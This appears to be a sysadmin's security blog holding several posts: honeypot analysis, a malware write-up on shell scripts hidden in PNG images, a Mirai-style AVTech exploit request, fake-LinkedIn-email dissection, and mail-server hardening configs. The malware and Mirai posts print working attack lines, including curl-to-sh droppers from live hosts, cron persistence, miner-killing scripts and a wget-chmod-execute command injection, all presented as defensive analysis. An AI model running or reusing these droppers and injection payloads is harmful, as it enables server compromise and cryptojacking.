Updating wordlists from Elasticsearch  

Posted at 8:34 am in Uncategorized

Among the many benefits of running a honeypot is gathering the credentials intruders try in order to log in. As explained in some earlier blog posts, my Cowrie honeypots are redirecting secondary connections to another honeypot running INetSim. For example, an intruder logged in to a Cowrie honeypot may use the established foothold to make further attempts towards other services. INetSim regularly logs various attempts to create fake Facebook profiles, log in to various mail accounts, and submit product reviews.

 

Top 15 hostnames that honeypot intruders try to submit data to

 

INetSim activity is obviously tracked as well, which means that login credentials used by Cowrie intruders to gain further access elsewhere will also be stored. I’m logging all honeypot activity to Elasticsearch for easy analysis and for making nice visualizations.

 

Most recent usernames and passwords used by intruders

 

Real passwords are always nice to have for populating wordlists used for e.g. password quality assurance, as dictionary attacks are often more efficient than bruteforcing. For this purpose I’m maintaining a local password list extracted from Elasticsearch. With the recent addition of the SQL interface, this extraction process was easy to script.

 

#!/bin/bash
PASSFILE=/some/path/to/honeypot_passwords.list
TODAY=$(date +%Y.%m.%d)

# Passwords from today's Cowrie login attempts
echo "select \"cowrie.password\" from \"logstash-${TODAY}\" \
 where \"cowrie.password\" is not null;" \
 | /usr/share/elasticsearch/bin/elasticsearch-sql-cli 2>&1 \
 | tail -n +7 | head -n -1 | sort -u \
 | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' \
 | while IFS= read -r p; do
   grep -qax "${p}" "${PASSFILE}" || echo "$p" | tee -a "${PASSFILE}"
done

# Passwords from INetSim-tagged service logins
echo "select \"password\" from \"logstash-${TODAY}\" \
 WHERE \"service\" IS NOT NULL AND \"password\" IS NOT NULL \
 AND MATCH(tags, 'inetsim');" \
 | /usr/share/elasticsearch/bin/elasticsearch-sql-cli 2>&1 \
 | tail -n +7 | head -n -1 | sort -u \
 | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' \
 | while IFS= read -r p; do
   grep -qax "${p}" "${PASSFILE}" || echo "$p" | tee -a "${PASSFILE}"
done

 

This script (although with some more pipes and filters) is regularly run by cron, continuously adding more fresh passwords to the local wordlist.
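For reference, the cron entry driving this could be as simple as the following (the path and schedule here are made up for illustration, not the actual setup):

```
# /etc/cron.d/honeypot-wordlist (hypothetical): run the extraction script
# nightly, late enough to catch most of the day's logstash index
55 23 * * * root /usr/local/bin/update-honeypot-wordlist.sh
```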

Written by bjorn on November 13th, 2018


X-Forwarded-For DDoS  

Posted at 10:55 pm in Uncategorized

A discussion forum of one of Redpill Linpro's customers has been under attack lately, through a number of DoS and DDoS variants. Today's attack strain was of the rather interesting kind, as one of its very distinctive identifiers was a suspicious, not to say ridiculous, number of IP addresses in the incoming X-Forwarded-For HTTP header. The X-Forwarded-For IP addresses included both IPv4 and IPv6 addresses.

The longest X-F-F header observed contained no less than 20 IP addresses that the HTTP request had allegedly been forwarded through on its way to the forum. If we are to believe the headers, this particular request has been following this route: United States → United States → South Africa → United States → United States → Mexico → Uruguay → China → Germany → United States → United States → South Africa → United States → United States → Mexico → Uruguay → China → Germany → Costa Rica → Norway.

This short animation (click to play) illustrates a few of the alleged routes:

Whether the HTTP requests have indeed been proxied through all these relays is difficult to confirm. By their reverse DNS lookups, quite a few of the IP addresses identify themselves as proxy servers. Checking a sample of the listed IP addresses did not reveal any open proxies or other kinds of relays, nor were they listed on common open relay blacklists. The HTTP headers included a Via: header as well, indicating that the request did pass through some HTTP proxies. But as we know, incoming headers can't be trusted and should never be treated as if they could be.

For the purpose of blocking the DDoS attack, it’s not really interesting whether the intermediate IP addresses are real or just faked. We simply reconfigured Varnish to check each incoming HTTP request for two things:

  • Does the X-Forwarded-For header have more than five IP addresses?
  • Is the request destined for the forum currently under siege?

All requests matching the above criteria were then efficiently rejected with the well-known, all-purpose 418 I’m a teapot HTTP response. After a minute or two of serving 418 responses, the attack stopped abruptly.
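A minimal sketch of such a rule in VCL 4 could look like the following (the hostname is hypothetical, and the real configuration contained more filters than shown here):

```vcl
sub vcl_recv {
    # More than five IP addresses implies at least five commas in the header
    if (req.http.X-Forwarded-For ~ "([^,]+,){5,}" &&
        req.http.Host == "forum.example.com") {
        # Reject with the all-purpose 418 response
        return (synth(418, "I'm a teapot"));
    }
}
```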

Written by bjorn on March 19th, 2018


Control code usernames in telnet honeypot  

Posted at 9:19 am in Uncategorized

By running a Cowrie honeypot, I'm gathering interesting information about various kinds of exploits, vulnerabilities, and botnets. Upon discovery of a new Linux-based vulnerability – often targeting network routers, IoT devices, and lately many IP camera products – the botnets will usually come in waves, testing the new exploits.

The honeypot logs everything the intruders do. In addition to extracting and submitting useful indicators to threat intelligence resources like VirusTotal and AlienVault's Open Threat Exchange, I'm processing the logs in an Elastic stack for graphing and trending. As shown below, there's a section of the Kibana dashboard that details activity by time range and geolocation, and I'm also listing the top 10 usernames and passwords used by intruders trying to gain access.

Parts of my Cowrie dashboard in Kibana


This morning I briefly checked the top 10 usernames tag cloud when something unusual caught my eye.

Kibana username tag cloud

It wasn't the UTF rectangle appended to the "shell" and "enable" usernames; those are really shell\u0000, enable\u0000, and sh\u0000, and they appear quite frequently nowadays. What caught my eye was this tiny, two-character username, looking like an upside-down version of the astrological sign for Leo followed by a zigzag arrow.

Weird username from tag cloud

Upon closer inspection, the username is actually \u0014\t\t\u0012 – “Device Control 4”, two TABs, and “Device Control 2”.
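The bytes can be reproduced in a shell to confirm what they are (\u0014 is octal 024 and \u0012 is octal 022):

```shell
# Emit DC4, TAB, TAB, DC2 and dump the raw bytes
printf '\024\t\t\022' | od -An -c
```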

One of the passwords used with this username was \u0002\u0003\u0000\u0007\u0013 – visualized in Kibana as follows:

Other passwords from the same IPs also include different control codes, beautifully visualized by Kibana as shown below:

From the Cowrie logs, the first occurrences in my honeynet were on 2017-12-16. Exactly what kind of vulnerability these control codes are targeting is not yet known to me, but I am sure we will find out over the next few days.

Written by bjorn on December 21st, 2017


Covert channels: Hiding shell scripts in PNG files  

Posted at 11:15 am in Uncategorized

A colleague made me aware of a JBoss server having been compromised. Upon inspection, one of the processes run by the JBoss user account was this one:

sh -c curl hxxp://img1.imagehousing.com/0/beauty-287196.png -k|dd skip=2446 bs=1|sh

 

This is a rather elegant way of disguising malicious code. If we first take a look at the png file:

$ file beauty-287196.png
beauty-287196.png: PNG image data, 160 x 160, 8-bit colormap, non-interlaced

 

Then, let’s extract its contents like the process shown above does:

$ cat beauty-287196.png | dd skip=2446 bs=1 > beauty-287196.png.sh
656+0 records in
656+0 records out
656 bytes copied, 0,00166122 s, 395 kB/s
$ file beauty-287196.png.sh
beauty-287196.png.sh: ASCII text

 

Lo and behold, we now have a shell script file with the following contents:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
curl hxxp://img1.imagehousing.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh
echo "*/60 * * * * curl hxxp://img1.imagehousing.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/60 * * * * curl hxxp://img1.imagehousing.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh" > /var/spool/cron/crontabs/root
(crontab -l;printf '*/60 * * * * curl hxxp://img1.imagehousing.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh \n')|crontab -
while true
do
        curl hxxp://img1.imagehousing.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh
        sleep 3600
done

 

As we can see, the shell script will try to replace different users' cron schedules with the contents of a downloaded file. This is the shell script extracted from the beauty-036457.png file:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
days=$(($(date +%s) / 60 / 60 / 24))
DoMiner()
{
    curl -kL -o /tmp/11232.jpg hxxp://img1.imagehousing.com/0/art-061574.png
    dd if=/tmp/11232.jpg skip=7664 bs=1 of=/tmp/11231
    curl -kL -o /tmp/11234.jpg hxxp://img1.imagehousing.com/0/pink-086153.png
    dd if=/tmp/11234.jpg skip=10974 bs=1 of=/tmp/11233
    chmod +x /tmp/11231
    nohup /tmp/11231 -c /tmp/11233 &
    sleep 10
    rm -rf /tmp/11234.jpg
    rm -rf /tmp/11233
    rm -rf /tmp/11232.jpg
    rm -rf /tmp/11231
}
ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4 
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB 
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df 
pkill -f cpuloadtest 
pkill -f crypto-pool 
pkill -f xmr 
pkill -f prohash 
pkill -f monero 
pkill -f miner
pkill -f nanopool 
pkill -f minergate 
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9 
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "11231" || DoMiner

 

The shell script starts by downloading even more resources, then looks for – and kills – competing cryptocurrency mining processes. Finally, it starts its own miner (a cryptonight/Monero miner, judging by the pool names and wallet addresses it references). I'll describe the downloaded components:

The first file it downloads (art-061574.png) is, after extraction, a binary:

$ file 11231
11231: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped

 

The extracted file’s MD5/SHA1/SHA256 hashes are as follows:

483b322b42835227d98f523f9df5c6fc
91e71ca252d1ea759b53f821110d8f0ac11b4bff
28d5f75e289d652061c754079b23ec372da2e8feb1066a3d57381163b614c06c

 

Based on its checksum, the file is a cryptocurrency miner very well known to VirusTotal.

The next file it downloads (pink-086153.png)  is – after extraction – a config file. Its contents are:

{
 "url" : "stratum+tcp://212.129.44.155:80",
 "url" : "stratum+tcp://62.210.29.108:80",
 "url" : "stratum+tcp://212.83.129.195:80",
 "url" : "stratum+tcp://212.129.44.157:80",
 "url" : "stratum+tcp://212.129.46.87:80",
 "url" : "stratum+tcp://212.129.44.156:80",
 "url" : "stratum+tcp://212.129.46.191:80",
 "user" : "[ID]",
 "pass" : "x",
 "algo" : "cryptonight",
 "quiet" : true
}

 

We see that the script executes the first downloaded component (the ELF binary) with the other downloaded component as its config. Since this compromise never obtained root privileges, root’s cron jobs were never impacted.
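The append-and-skip trick itself is easy to reproduce. The sketch below uses a 100-byte stand-in for the image data and hypothetical filenames:

```shell
# Build a "polyglot": 100 bytes of stand-in image data, then a shell script
head -c 100 /dev/zero > fake.png
echo 'echo hello from hidden script' >> fake.png

# Recover and run the hidden script, exactly like the malicious process did
dd if=fake.png skip=100 bs=1 2>/dev/null | sh
```

With a real image, the skip value is simply the byte size of the original image file (e.g. from `stat -c %s image.png`), which is why the file still identifies as valid PNG image data.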

The interesting thing about this compromise was not the binaries themselves, nor the fact that the JBoss server was vulnerable – but the covert transport mechanisms. We found no less than four different miner binaries in the JBoss account's home directory, indicating that several bots have been fighting over this server. As an additional bonus, the following entry was found in the JBoss account's crontab:

*/1 * * * * curl 107.182.21 . 232/_x2|sh

 

The _x2 file contains the following shell script:

AGENT_FILE='/tmp/cpux'
if [ ! -f $AGENT_FILE ]; then
 curl 107.182.21 . 232/cpux > $AGENT_FILE
fi
if [ ! -x $AGENT_FILE ]; then
 chmod +x $AGENT_FILE
fi
ps -ef|grep $AGENT_FILE|grep -v grep
if [ $? -ne 0 ]; then
 nohup $AGENT_FILE -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u [ID] -p x > /dev/null 2>&1 &
fi

 

The cpux file is also thoroughly registered in VirusTotal (at the time of writing, 29 antivirus products identify it as malicious). It has the same checksums as the 11231 file described earlier.

 

Written by bjorn on April 21st, 2017


Fake LinkedIn invites  

Posted at 10:21 am in Uncategorized

Yet another fake LinkedIn invite landed in my inbox today. Just for the fun of it, I decided to dissect the fake invite.

LinkedIn scam mail

The first thing that caught my attention was the email's subject: Add Me On LinkedIn. Normally, LinkedIn invite requests appear polite and humble; this one, not so much.

Next was the sender address. LinkedIn has most of their ducks in a row when it comes to email standards compliance – as you should when you're a mass mailer – but this sender didn't even care to fake an email address. When receiving the message, my mail server registered the header as simply From: Linkedin (just the name, no email address); the server's own address was appended in the final representation.

Then there's the fact that every clickable item in the email links to a South African site, hxxp://simplystickerz.co.za/, identified as harmful by five different vendors at VirusTotal.

The last dead giveaway was the image of the alleged sender. While not visible in the email itself, the email was supposed to include the image from a remote URL in the ggpht.com domain. The domain belongs to Google and is used for serving static images for YouTube and other sites. A quick Google reverse image search revealed that this was no other than Mohammed bin Rashid Al Maktoum, the Vice President of the United Arab Emirates.

Other details include broken or missing images, backgrounds, and buttons. The scammers even made an (unconscious?) effort to link some of them through Google caches/proxies. If at all intentional, it could have been to avoid LinkedIn getting suspicious over multiple unrelated image requests. It’s only too bad that none of the destination URLs exist, causing broken images in the email.

With a few minor improvements, this mail would have the potential to scam even more recipients. At least if we ignore that the mail originated from the babytrend.com domain 🙂

Written by bjorn on April 18th, 2017


Yet another Mirai strain targeting AVTech devices  

Posted at 8:21 am in Uncategorized

My Suricata IDS triggered on an HTTP request to my honeypot this morning:

ET WEB_SERVER Suspicious Chmod Usage in URI

 

Further investigation revealed this incoming request:

 POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget%20-O%20/tmp/Arm1%20http://172.247.x.y:85/Arm1;chmod%200777%20/tmp/Arm1;/tmp/Arm1 HTTP/1.1
 Host: [redacted]
 Connection: keep-alive
 Accept-Encoding: gzip, deflate
 Accept: */*
 User-Agent: python-requests/2.13.0
 Content-Length: 0
 Authorization: Basic YWRtaW46YWRtaW4=

 

The request seems to take advantage of a vulnerability in AVTech devices, described here, here and here (and elsewhere).

URL decoding the query string yields the following commands (formatted for readability, and URL redacted to avoid accidental downloads):

wget -O /tmp/Arm1 http://172.247.x.y:85/Arm1
chmod 0777 /tmp/Arm1
/tmp/Arm1
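For reference, the query string can be URL-decoded directly in bash (a sketch; the address is redacted as above):

```shell
q='wget%20-O%20/tmp/Arm1%20http://172.247.x.y:85/Arm1;chmod%200777%20/tmp/Arm1;/tmp/Arm1'
# Rewrite every %XX escape as \xXX and let printf's %b expand the escapes
printf '%b\n' "${q//%/\\x}"
```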

 

In other words, the request will trick the targeted device into downloading a file, changing the file's permissions, and executing it locally. The Arm1 file identifies as follows:

Arm1: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.14, not stripped

 

The IP address performing the request, 137.59.18.190, belongs to a company in Hong Kong (but registered with Korea Telecom). The IP from which the binary is downloaded, 172.247.116.21, seems to belong to a U.S. cloud provider. At the time of writing, no antivirus provider used by VirusTotal knows anything about the URL or the downloaded file, and the anlyz malware analysis sandbox finds nothing wrong with it. However, judging from the nature of the request I think it’s safe to assume that this is most likely malicious, possibly another Mirai strain or something equivalent.

This blog post will be updated with more details. A full packet capture is available, but since the request only reached my honeypot it won’t be very useful.

 

Update #1: An additional request

I’ve seen additional requests, trying to download the same file but probably through a different vulnerability. This is the request – a GET instead of the previous POST:

GET /cgi-bin/;wget%20-O%20/tmp/Arm1%20http://172.247.a.b:8080/Arm1;chmod%200777/tmp/Arm1;/tmp/Arm1 HTTP/1.1

 

For this request, the requesting IP (137.59.19.132) is registered to the same Hong Kong company and the IP hosting the ARM binary (172.247.116.3) belongs to the same U.S. cloud provider.

 

Update #2: The binary’s content

The ARM binary appears to include some kind of proxy, apparently named "wake", including wrapper scripts. Using strings(1), the script excerpts below can be found in the binary:

#!/bin/sh
 while true;do
 server=`netstat -nlp | grep :39999`
 if [ ${#server} -eq 0 ] ; then
 nohup %s -c 1 &
sleep 5
done

 

and

#!/bin/sh
### BEGIN INIT INFO
# Provides: wake
# Required-Start: $remote_fs
# Required-Stop: $remote_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Start or stop the HTTP Proxy.
### END INIT INFO
case "$1" in
 start)
 nohup /usr/bin/wake -c 1 &
 ;;
 stop)
 ;;
esac

 

Judging from the scripts, the “wake” proxy listens on port 39999. The IP address 192.154.108.2 (GorillaServers, Inc., US) is also seen in the binary.

 

Update #3: Other observations

Some IPs in the same ranges, as well as similar download URLs, have been reported in other people's honeypots too, along with the ARM binary's hashes.

 

Update #4: detux

Among other things, analyzing the binary in detux confirms the mentioned IP address, finding that it will connect to 192.154.108.2:77. The IP and socket are available and listening but give no sensible response. Best guess: a command and control station.

Written by bjorn on February 27th, 2017


Blocking bots from the Cutwail botnet  

Posted at 4:05 pm in Uncategorized

Recently I've seen an increase in mail spambots identifying with the EHLO string ylmf-pc. These belong to (or at least stem from) the Cutwail botnet, originally observed as early as 2007.

The following table shows the number of attempts over the last two weeks. The numbers are not overwhelming for a private mail server, but enough to be found annoying.

Jan 11: 1794
Jan 12:  444
Jan 13:  150
Jan 14:  621
Jan 15:  391
Jan 16:  183
Jan 17:  388
Jan 18:  681
Jan 19:  296
Jan 20:  625
Jan 21:  165
Jan 22: 1242
Jan 23: 2534
Jan 24:  148
Jan 25: 1702

 

Running Postfix, I have of course already established a HELO check that will reject these attempts:

File: /etc/postfix/helo_access

ylmf-pc REJECT

 

The corresponding postconf setting:

smtpd_helo_restrictions =
 permit_mynetworks
 check_helo_access hash:/etc/postfix/helo_access
 permit

 

However, I've also configured postscreen in my Postfix instance. Most of the spambots are rejected by postscreen and thus never reach the mail server. Still, every spambot will easily make 10 to 15 attempts, and every attempt creates quite a bit of log noise. I'd like to reject them quickly so they're not polluting my logs, and this is where fail2ban becomes a useful ally. Since there was no available fail2ban filter for postscreen, I wrote one myself, along with the corresponding config/activation file – both suffixed .local so as not to interfere with future upgrades.

File: /etc/fail2ban/filter.d/postscreen.local

[INCLUDES]
before = common.conf

[Definition]
_daemon = postfix/postscreen
failregex = ^%(__prefix_line)sPREGREET \d+ after \d+\.\d+ from \[<HOST>\]:\d+: EHLO ylmf-pc\\r\\n
ignoreregex =

 

File: /etc/fail2ban/jail.local

[postscreen]
port = smtp,465,submission
logpath = %(postfix_log)s
enabled = true
maxretry = 1

 

After restarting fail2ban, the combination of the above files will block every spambot identifying with the characteristic EHLO greeting the first time it makes an attempt.
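A quick way to sanity-check the pattern outside fail2ban is to grep a representative log line. The sample line below is made up, but follows the structure of postscreen's PREGREET logging:

```shell
line='Jan 28 12:00:01 mx postfix/postscreen[2211]: PREGREET 11 after 0.25 from [192.0.2.15]:51023: EHLO ylmf-pc\r\n'
printf '%s\n' "$line" \
  | grep -Eq 'PREGREET [0-9]+ after [0-9.]+ from \[[0-9.]+\]:[0-9]+: EHLO ylmf-pc' \
  && echo 'filter would match'
```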

 

Written by bjorn on January 28th, 2017


Enabling SNMP support in Amavisd-new  

Posted at 10:13 pm in Uncategorized

If there’s a short and sweet installation document for enabling SNMP support in Amavisd-new, I seem to have failed searching for it today. Instead I made my own, partially for documenting my own setup and partially for the benefit of others.

This brief installation document assumes you’re running a Ubuntu or Debian system. It will also assume that your Amavisd-new service is installed and running as one should expect.

First, install the programs and their dependencies. The Amavisd-new SNMP subagent metrics are available through the regular Net-SNMP software suite. Note: The /etc/default/amavisd-snmp-subagent file says it needs libnet-snmp-perl, but it will also require the libsnmp-perl package.

# apt-get install libnet-snmp-perl libsnmp-perl snmp-mibs-downloader snmp snmpd

 

Then, download all the MIBs you'll need (and a few more). Due to distribution restrictions, Debian-based systems provide a separate downloader that saves the MIBs where they belong.

# download-mibs

Downloading documents and extracting MIB files.
This will take some minutes.
[...]

 

When the download process has completed, allow the SNMP server and the SNMP agent to locate and use the MIBs by commenting out or removing the appropriate lines in /etc/default/snmpd and /etc/snmp/snmp.conf respectively:

File: /etc/default/snmpd

# This file controls the activity of snmpd

# Don't load any MIBs by default.
# You might comment this lines once you have the MIBs downloaded.
# export MIBS=

 

and

File: /etc/snmp/snmp.conf

# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
# mibs :

 

For MIB support for the Amavisd-new metrics (yes you want this), download the AMAVIS-MIB file into the directory /usr/share/snmp/mibs/:

# wget https://amavis.org/AMAVIS-MIB.txt -O /usr/share/snmp/mibs/AMAVIS-MIB.txt

 

Enable the Amavisd-new SNMP agent by configuring its default setting file:

File: /etc/default/amavisd-snmp-subagent

# To enable the amavis-snmp-subagent set ENABLED to yes

ENABLED="yes"

 

The Amavisd-new SNMP subagent will register a couple of OIDs with SNMPd using the AgentX protocol. Below is part of the output from a debug run, indicating which OIDs it will register with SNMPd.

NET-SNMP version 5.7.3 AgentX subagent connected
registering root OID 1.3.6.1.4.1.15312.2.1.1 for am.snmp
registering root OID 1.3.6.1.4.1.15312.2.1.2 for am.nanny
registering root OID 1.3.6.1.4.1.15312.2.1.3.1.1 for pf.maildrop
registering root OID 1.3.6.1.4.1.15312.2.1.3.1.2 for pf.incoming
registering root OID 1.3.6.1.4.1.15312.2.1.3.1.3 for pf.active
registering root OID 1.3.6.1.4.1.15312.2.1.3.1.4 for pf.deferred

 

We now need to tell SNMPd to expose these OIDs. We do that by adding the following line, with an OID base covering all of the above, to /etc/snmp/snmpd.conf:

view systemonly included .1.3.6.1.4.1.15312.2.1

 

Finally, (re)start all the services involved.

# service snmpd restart
# service amavis restart
# service amavisd-snmp-subagent restart

 

After a short while you should be able to read Amavis statistics over SNMP!

# snmpwalk -m +AMAVIS-MIB -c public -v2c 127.0.0.1 1.3.6.1.4.1.15312.2.1
[...]
AMAVIS-MIB::inMsgs.0 = Counter32: 41
AMAVIS-MIB::inMsgsOpenRelay.0 = Counter32: 41
AMAVIS-MIB::inMsgsStatusAccepted.0 = Counter32: 35
AMAVIS-MIB::inMsgsStatusRejected.0 = Counter32: 6
AMAVIS-MIB::inMsgsSize.0 = Counter64: 456221
AMAVIS-MIB::inMsgsSizeOpenRelay.0 = Counter64: 456221
AMAVIS-MIB::inMsgsRecips.0 = Counter32: 41
AMAVIS-MIB::inMsgsRecipsOpenRelay.0 = Counter32: 41
AMAVIS-MIB::inMsgsBounce.0 = Counter32: 9
AMAVIS-MIB::inMsgsBounceNullRPath.0 = Counter32: 2
AMAVIS-MIB::inMsgsBounceUnverifiable.0 = Counter32: 9
AMAVIS-MIB::outMsgs.0 = Counter32: 15
AMAVIS-MIB::outMsgsSubmit.0 = Counter32: 15
AMAVIS-MIB::outMsgsSubmitQuar.0 = Counter32: 9
AMAVIS-MIB::outMsgsSubmitNotif.0 = Counter32: 6
AMAVIS-MIB::outMsgsProtoLocal.0 = Counter32: 9
AMAVIS-MIB::outMsgsProtoLocalSubmit.0 = Counter32: 9
AMAVIS-MIB::outMsgsProtoSMTP.0 = Counter32: 6
AMAVIS-MIB::outMsgsProtoSMTPSubmit.0 = Counter32: 6
AMAVIS-MIB::outMsgsDelivers.0 = Counter32: 15
AMAVIS-MIB::outMsgsSize.0 = Counter64: 87735
AMAVIS-MIB::outMsgsSizeSubmit.0 = Counter64: 87735
AMAVIS-MIB::outMsgsSizeSubmitQuar.0 = Counter64: 87729
AMAVIS-MIB::outMsgsSizeSubmitNotif.0 = Counter64: 6
AMAVIS-MIB::outMsgsSizeProtoLocal.0 = Counter64: 87729
AMAVIS-MIB::outMsgsSizeProtoLocalSubmit.0 = Counter64: 87729
AMAVIS-MIB::outMsgsSizeProtoSMTP.0 = Counter64: 6
AMAVIS-MIB::outMsgsSizeProtoSMTPSubmit.0 = Counter64: 6
AMAVIS-MIB::quarMsgs.0 = Counter32: 9
AMAVIS-MIB::quarBadHdrMsgs.0 = Counter32: 3
AMAVIS-MIB::quarSpamMsgs.0 = Counter32: 6
AMAVIS-MIB::quarMsgsSize.0 = Counter64: 87729
AMAVIS-MIB::quarBadHdrMsgsSize.0 = Counter64: 8273
AMAVIS-MIB::quarSpamMsgsSize.0 = Counter64: 79456
AMAVIS-MIB::contentCleanMsgs.0 = Counter32: 32
AMAVIS-MIB::contentCleanMsgsOpenRelay.0 = Counter32: 32
AMAVIS-MIB::contentBadHdrMsgs.0 = Counter32: 3
AMAVIS-MIB::contentBadHdrMsgsOpenRelay.0 = Counter32: 3
AMAVIS-MIB::contentSpamMsgs.0 = Counter32: 6
AMAVIS-MIB::contentSpamMsgsOpenRelay.0 = Counter32: 6
AMAVIS-MIB::outConnNew.0 = Counter32: 6
[...]

 

You should now be able to throw different kinds of monitoring software on Amavisd-new.

 

Written by bjorn on January 22nd, 2017


Icinga/Nagios check for Sophos antivirus signature freshness  

Posted at 9:19 pm in Uncategorized

I’ve been running Amavisd-new with scanner components like ClamAV and SpamAssassin on the mail relay for my personal mail for several years. Lately I’ve been thinking that since Amavis supports multiple content scanners I should add another antivirus product. Unfortunately there’s a limited number of free (for home/individual use) antivirus products running on Linux, and quite a few of them are not being maintained, but I found a very promising candidate from Sophos.

Adding Sophos antivirus for Linux to Amavisd-new wasn’t all that difficult (and is covered by other articles elsewhere), but one thing was missing to complete the picture: An automated method for checking whether Sophos is running with updated antivirus signature files. I was hoping to find or write something that could be used with Icinga (or Nagios).

Conveniently, Sophos provides an XML URL containing the file name and md5sum of the latest signature file. Below is the status file at the time of writing:

<?xml version="1.0" encoding="utf-8"?>
<latest><ide>
<name>vawtr-ig.ide</name>
<md5>f6f7cda04be9192f23972a2735fbfaca</md5>
<size>21584</size>
<timestamp>2017-01-18T14:11:00</timestamp>
<published>2017-01-18T17:11:27</published>
</ide></latest>

 

Having found the status file, writing a short script didn’t take long. I’m using xmlstarlet for better readability. The script is stored as /usr/local/bin/check_sophos.

#!/bin/bash

SOPHOSDIR=/opt/sophos-av/lib/sav

/usr/bin/GET https://downloads.sophos.com/downloads/info/latest_IDE.xml | \
/usr/bin/xmlstarlet fo | \
/usr/bin/awk -F \(\<\|\>\) '{print $2" "$3}' | \
while read attribute value; do
  if [ "$attribute" = "name" ]; then
    FILE="$value"
  elif [ "$attribute" = "md5" ]; then
    MD5SUM="$value"
  fi
  if [ "x$FILE" != "x" -a "y$MD5SUM" != "y" ]; then
    if [ ! -e "${SOPHOSDIR}/${FILE}" ]; then
      echo "WARNING: Sophos has not yet downloaded its latest signature file."
      exit 1
    fi
    CHECKSUM=$(/usr/bin/md5sum "${SOPHOSDIR}/${FILE}" | /usr/bin/awk '{ print $1 }')
    if [ "$CHECKSUM" = "$MD5SUM" ]; then
      echo "OK: Newest signature file ${FILE} has the correct checksum ($MD5SUM)"
      exit 0
    else
      echo "WARNING: ${FILE} seems to be outdated."
      exit 1
    fi
    # Cleanup
    FILE=""; MD5SUM="";
  fi
done

 

As those fluent in shell scripting will easily see, the script reads the XML status URL and extracts the file name and md5sum of the most recent antivirus signature file. Then the script checks for the file’s existence, and triggers a warning if the file isn’t there. If the file is present, its md5sum is compared to what should be expected from the XML status URL.

After testing the script I added it to Icinga via NRPE, so now I’ll be getting a notice if something’s wrong with Sophos’ antivirus update.
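For reference, the NRPE side can be as simple as a single command definition (a hypothetical excerpt; adjust the path to your setup):

```
# /etc/nagios/nrpe.cfg (hypothetical excerpt)
command[check_sophos]=/usr/local/bin/check_sophos
```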

Written by bjorn on January 18th, 2017


How to produce AfterGlow diagrams from Cowrie  

Posted at 9:34 am in Uncategorized

